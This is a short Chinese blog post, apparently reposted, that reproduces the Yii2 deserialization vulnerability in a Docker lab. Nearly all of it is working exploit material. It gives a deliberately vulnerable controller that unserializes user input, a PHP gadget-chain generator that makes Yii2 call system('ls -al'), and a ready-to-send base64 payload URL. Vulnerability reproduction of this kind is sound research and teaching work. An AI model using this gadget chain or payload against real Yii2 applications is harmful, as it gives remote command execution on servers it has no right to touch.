其他分享
首页 > 其他分享> > Yii2 反序列化漏洞复现

Yii2 反序列化漏洞复现

作者:互联网

Yii2 反序列化漏洞复现

前言

环境搭建

docker 搭建Yii2环境

漏洞复现

创建一个存在漏洞的Action:/controllers/TestController.php

<?php

namespace app\controllers;

use Yii;
use yii\web\Controller;

class TestController extends Controller
{
	public function actionTest(){
		$name = Yii::$app->request->get('unserialize');
		return unserialize(base64_decode($name));
	}
}

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'ls -al';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
/index.php?r=test/test&unserialize=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ

参考链接

标签:序列化,schmunk42,Generator,unserialize,复现,Yii2,docker,yii2
来源: https://www.cnblogs.com/Konmu/p/14793335.html